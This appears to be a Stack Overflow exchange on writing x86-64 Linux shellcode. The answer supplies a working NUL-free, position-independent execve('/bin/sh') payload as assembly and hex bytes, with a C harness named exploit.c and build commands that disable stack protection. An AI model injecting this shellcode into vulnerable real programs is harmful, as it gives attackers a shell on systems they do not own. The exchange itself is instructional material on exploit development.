2

I am new at shellcode development and I can't understand why generated shellcode does not works as expected.

Assembler Code:

Based on an answer to my previous question.

.section .data
cmd:    .string "/bin/sh"               /* command string */
hand:   .string "-c"                    /* command arguments string */
args:   .string "ls -al"                /* arguments string */
argv:   .quad cmd                       /* array of command, command arguments and arguments */
        .quad hand
        .quad args
        .quad 0

.section .text
.globl _start
_start:
        movq    $59,            %rax    /* call execve system call */
        leaq    cmd(%rip),      %rdi    /* save command to rdi */
        leaq    argv(%rip),     %rsi    /* save args to rsi */
        movq    $0,             %rdx    /* save NULL to rdx */

        syscall                         /* make system call */

C test code:

#include<stdio.h>
#include<string.h>

unsigned char shellcode[] = "\x48\xc7\xc0\x3b\x00\x00\x00\x48\x8d\x3d\xf2\x0f\x00\x00\x48\x8d\x35\xfd\x0f\x00\x00\x48\xc7\xc2\x00\x00\x00\x00\x0f\x05";

int main()
{
    int (*ret)() = (int(*)())shellcode;
    ret();
}

Output:

Illegal instruction

Details: Kali Linux GNU/Linux i386 x86_64

1
  • 3
    Your code has no chance of working without the data. It is likely that the syscall fails and returns with an error code, then execution continues into memory containing garbage that happens to decode as an illegal instruction. Commented Oct 18, 2020 at 17:36

1 Answer 1

2

The problem with your code is that the shell string you generated doesn't include any of the data. And the data includes absolute pointers so is not position independent, so wouldn't work if you did move it to .text and include it. Once run inside another program as you are doing in the C code the program will attempt to find data that doesn't exist and at fixed memory locations that don't apply to the exploitable program you are running inside.

I think you may have another issue causing the Illegal instruction. You don't show how you build your C program, but I wonder if it is 32-bit and your shellcode is 64-bit. I am beginning to think your C program may have been compiled as a 32-bit program and the Illegal instruction may be because you can't reliably run 64-bit code (the shell code) in a 32-bit program. As an example, the SYSCALL instruction is an invalid opcode in a 32-bit program on non-AMD CPUs. This is just a guess in the absence of any more details about how you compile/assemble/link your shell code and your C program.


You will have to generate position independent code (PIC) so that it could run anywhere once loaded on the stack. Your data will have to be placed inside the segment with the code. The code also has to avoid generating the NUL character (0x00) since that would prematurely terminate a string if provided as user input to an actual exploitable program.

A version of your code that could be used for such purposes could look like:

shellcode.s:

# This shell code is designed to avoid any NUL(0x00) byte characters being generated
# and is coded to be position independent.

.section .text
.globl _start
_start:
    jmp overdata                 # Mix code and DATA in same segment

# Generate all the strings without a NUL(0) byte. We will replace the 0xff
# with 0x00 in the code
name:.ascii "/bin/sh"            # Program to run
name_nul: .byte 0xff             # This 0xff will be replaced by 0x00 in the code
arg1:.ascii "-c"                 # Program argument
arg1_nul: .byte 0xff             # This 0xff will be replaced by 0x00 in the code
arg2:.ascii "ls"                 # Program Argument
arg2_nul: .byte 0xff             # This 0xff will be replaced by 0x00 in the code

overdata:
    xor  %eax, %eax              # RAX = 0

    # All references to the data before our code will use a negative offset from RIP
    # and use a 4 byte displacement. This avoids producing unwanted NUL(0) characters
    # in the code. We use RIP relative addressing so the code will be position
    # independent once loaded in memory.

    # Zero terminate each of the strings
    mov  %al, arg2_nul(%rip)     
    mov  %al, arg1_nul(%rip) 
    mov  %al, name_nul(%rip)

    lea  name(%rip), %rdi        # RDI = pointer to program name string

    push %rax                    # NULL terminate the program argument array
    leaq arg2(%rip), %rsi
    push %rsi                    # Push address of the 3rd program argument on stack
    lea  arg1(%rip), %rsi
    push %rsi                    # Push address of the 2nd program argument on stack
    push %rdi                    # Push address of the program name on stack as 1st arg
    mov  %rsp, %rsi              # RSI = Pointer to the program argument array

    mov  %rax, %rdx              # RDX = 0 = NULL envp parameter

    mov $59, %al                 # RAX = execve system call number

    syscall

You can generate a C style string with:

as --64 shellcode.s -o shellcode.o
ld shellcode.o -o shellcode
objcopy -j.text -O binary shellcode shellcode.bin
hexdump -v -e '"\\""x" 1/1 "%02x" ""' shellcode.bin

The hexdump command above would output:

\xeb\x0e\x2f\x62\x69\x6e\x2f\x73\x68\xff\x2d\x63\xff\x6c\x73\xff\x31\xc0\x88\x05\xf7\xff\xff\xff\x88\x05\xee\xff\xff\xff\x88\x05\xe5\xff\xff\xff\x48\x8d\x3d\xd7\xff\xff\xff\x50\x48\x8d\x35\xda\xff\xff\xff\x56\x48\x8d\x35\xcf\xff\xff\xff\x56\x57\x48\x89\xe6\x48\x89\xc2\xb0\x3b\x0f\x05

You will notice there are no \x00 characters unlike your code. You could use this string directly in a C program like:

exploit.c:

int main(void)
{
    char shellcode[]="\xeb\x0e\x2f\x62\x69\x6e\x2f\x73\x68\xff\x2d\x63\xff\x6c\x73\xff\x31\xc0\x88\x05\xf7\xff\xff\xff\x88\x05\xee\xff\xff\xff\x88\x05\xe5\xff\xff\xff\x48\x8d\x3d\xd7\xff\xff\xff\x50\x48\x8d\x35\xda\xff\xff\xff\x56\x48\x8d\x35\xcf\xff\xff\xff\x56\x57\x48\x89\xe6\x48\x89\xc2\xb0\x3b\x0f\x05";

    int (*ret)() = (int(*)())shellcode;
    ret();

    return 0;
}

This has to be compiled and linked with an executable stack:

gcc -zexecstack exploit.c -o exploit

strace ./exploit would generate an EXECVE system call similar to:

execve("/bin/sh", ["/bin/sh", "-c", "ls"], NULL) = 0


Note: I would personally build the strings programmatically on the stack similar to the code in another Stackoverflow answer I wrote.

Sign up to request clarification or add additional context in comments.

2 Comments

You say your .s "can't be run directly", but it can if you link with --omagic to make .text writeable. Tested and works with gcc -static -nostdlib -Wl,--omagic foo.s && strace ./a.out. (Or put your code in .data and link with -zexecstack, which is actually on by default if you don't use a .note.gnu_stack directive.)
Unnecessary code-size optimizations, in case anyone's interested: You can also save 3 bytes per instruction if you do lea name(%rip), %rdi earlier, then use addressing modes like mov %al, arg2_nul-name(%rdi) and lea arg2-name(%rdi), %rsi. (RDI+disp8 instead of RIP+rel32). Setting envp=RDX=0 can be done more compactly with 1-byte cdq from the zeroed RAX, or with xor %edx,%edx. Or with mov %eax, %edx if you want. Or zero RDX in the first place instead of RAX, and set RAX=59 with 3-byte lea 59(%rdx), %eax

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.